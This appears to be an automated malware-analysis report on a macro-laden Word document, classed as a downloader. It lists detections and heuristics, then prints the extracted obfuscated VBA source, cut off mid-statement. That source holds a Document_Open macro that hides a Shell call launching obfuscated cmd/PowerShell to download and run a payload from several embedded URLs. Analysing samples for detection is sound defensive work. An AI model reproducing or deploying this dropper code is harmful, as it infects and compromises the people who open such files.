Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro that calls the Shell() function, which indicates an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Valyria-6691320-0' further supports its classification as a downloader. No specific malware family could be identified.
Heuristics (6)
- ClamAV: Doc.Downloader.Valyria-6691320-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6691320-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6015 bytes |

SHA-256 (macros.bas): b237b42aa2c9105f8dda32f5f1eea72414c5ae2955148e7a4b716ac6dd3dd68d
Preview script: first 1,000 lines of the extracted script (the analyzer truncates the preview, so the last line is cut mid-statement).

```vba
Attribute VB_Name = "LCdjIIW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month CStr("R" + "zUj")
Month CStr("140" + "MPQqkaI")
Month CStr("sSSu" + "j")
Month CStr("o" + "UEbiZ" + "R" + "4139")
Month CStr("441945302" + "2900")
Month CStr("388371720" + "695" + "105043418" + "zb")
Shell CStr(ndjipooLRjNK) + CStr(BMqkYbj) + PFjfFz + kwWoaX + FlijFIh + CStr(OXmcpbwVtiac) + CStr(JZUnZOjmiv), CStr(vbHide)
Month CStr("LX" + "214366043")
Month CStr("UzHjTMKvZKU" + "37642150")
Month CStr("76747318" + "BJL")
Month CStr("oo" + "wt" + "432979750" + "351988251")
Month CStr("obl" + "b" + "rJMZ" + "9736")
End Sub
Attribute VB_Name = "wcPdiTaHDTSlW"
Function PFjfFz()
On _
Error _
Resume _
Next
Month CStr("S" + "LSdSB" + "355973887" + "KNXN")
Month CStr("WdzY" + "XkMzAq")
pVrSoS = Chr(17 + 3 + 13 + 12 + 54) + "md /V" + ":O/" + Chr(12 + 2 + 9 + 8 + 36) + Chr(5 + 1 + 4 + 3 + 21) + "^" + "se^t" + " Q^" + "B=" + " ^ ^" + " "
Month CStr("p" + "407925282" + "wNjzuFJiLDS" + "VsO")
Month CStr("334818110" + "cYPK" + "lDRUVN" + "FIqHl")
Month CStr("409302300" + "shfFZHP" + "oiwCzdb" + "432751672")
Month CStr("zdJjYFQPF" + "LbN")
Month CStr("4523" + "dEKswMpKKoKHOU" + "1933" + "9551")
fKJwftJN = " " + " ^ ^" + " ^" + " " + " }}^" + "{^h" + Chr(17 + 3 + 13 + 12 + 54) + "^t^a" + Chr(17 + 3 + 13 + 12 + 54) + "^}" + "^;^k^" + "a" + "er" + "^b;" + "S" + "^l" + Chr(12 + 2 + 9 + 8 + 36) + "$ "
Month CStr("iJwSp" + "420596873")
sKlia = "^m^" + "et^I-^e" + "ko" + "vnI;)" + "Sl" + Chr(12 + 2 + 9 + 8 + 36) + "$ " + "^,L^l^M"
Month CStr("6891" + "315506170" + "6065" + "432910823")
FEuGMjSQcN = "$(el^i" + "F" + "dao^l" + "nw" + "oD^." + "^fO^Q^" + "$" + "^" + "{" + "yr^t{)" + "^ALn" + "^$ n"
Month CStr("VSQodJu" + "jntvVq" + "PTEcZJYZV" + "SDinCtpiZ")
Month CStr("zhwUqtphmnGXZ" + "MZodztutLF" + "qiuDN" + "WCUTXiFTikoIi")
Month CStr("298656949" + "2780")
Month CStr("42986049" + "104341897")
bBqAGJ = "i" + " L" + "l^M$(h" + Chr(17 + 3 + 13 + 12 + 54) + "a^er" + "o^" + "f^;^" + "'e^"
Month CStr("5912" + "jQ" + "wVwAGWsE" + "1800")
lQocQfjIswG = "x^e^" + ".^'^+d" + "US^$^+'" + "\^'+" + Chr(17 + 3 + 13 + 12 + 54) + "i" + "^"
Month CStr("dZrjVFQovjJSJ" + "8849" + "kj" + "5648")
Month CStr("jmN" + "4794")
Month CStr("7293" + "193962747")
Month CStr("cMN" + "TzADUNBlATP")
lDzMMcj = "l^b" + "^u^p" + ":v" + "ne$=Sl" + Chr(12 + 2 + 9 + 8 + 36) + "$^;'" + "339^' "
Month CStr("UKmD" + "tVpjuXDhpFsi" + "kD" + "6597")
Month CStr("ipD" + "vB" + "129401791" + "uZTKVTJNzOasL")
rRJuhUjLC = "^=" + " d" + "^U^" + "S^" + "$;)^"
Month CStr("385519657" + "MIUi")
Month CStr("TYwEKb" + "AVzTwpVEtLWvik")
SkTnjTVO = "'^@^" + "'(t^i^l" + "^p^S.'B" + "^A9y" + "R2^s/^" + "ur.hs^"
Month CStr("438438974" + "9669")
Month CStr("IctrL" + "528476178" + "109330840" + "XzOFu")
iEzIznJOlM = "i^mi" + "/" + "/^:" + "^pt^t^" + "h^@Z^" + "Qf/^u" + "r" + "^" + ".m^b^s" + "^-t^" + "ev^s^"
PFjfFz = pVrSoS + fKJwftJN + sKlia + FEuGMjSQcN + bBqAGJ + lQocQfjIswG + lDzMMcj + rRJuhUjLC + SkTnjTVO + iEzIznJOlM
Month CStr("iP" + "scYPMkrTw" + "5109" + "9847")
Month CStr("8554" + "201960050" + "PvPPoc" + "354037052")
End Function
Function kwWoaX()
On _
Error _
Resume _
Next
Month CStr("J" + "Ww")
Month CStr("NPm" + "j")
Month CStr("vrCX" + "107474268" + "dpj" + "5616")
Month CStr("PKh" + "2446" + "7103" + "8796")
zIlNsZwN = "s^ar/" + "/:^p^" + "t" + "t^h@GR" + "VV" + "lVH4/" + "ri^.dij" + "^a^mn^a" + "re^f^" + "az" + "//^:" + "^p" + "^t^t^"
Month CStr("XnHjMo" + "GcS" + "398586780" + "6736")
Month CStr("7029" + "hl" + "4711" + "2253")
tZaqkLiXtuh = "h@" + "S" + "7/m^o" + Chr(17 + 3 + 13 + 12 + 54) + ".s^o" + Chr(17 + 3 + 13 + 12 + 54) + "n" + "e^m" + "a^l^" + "fer" + "^" + "tn^e
' ... (truncated)
```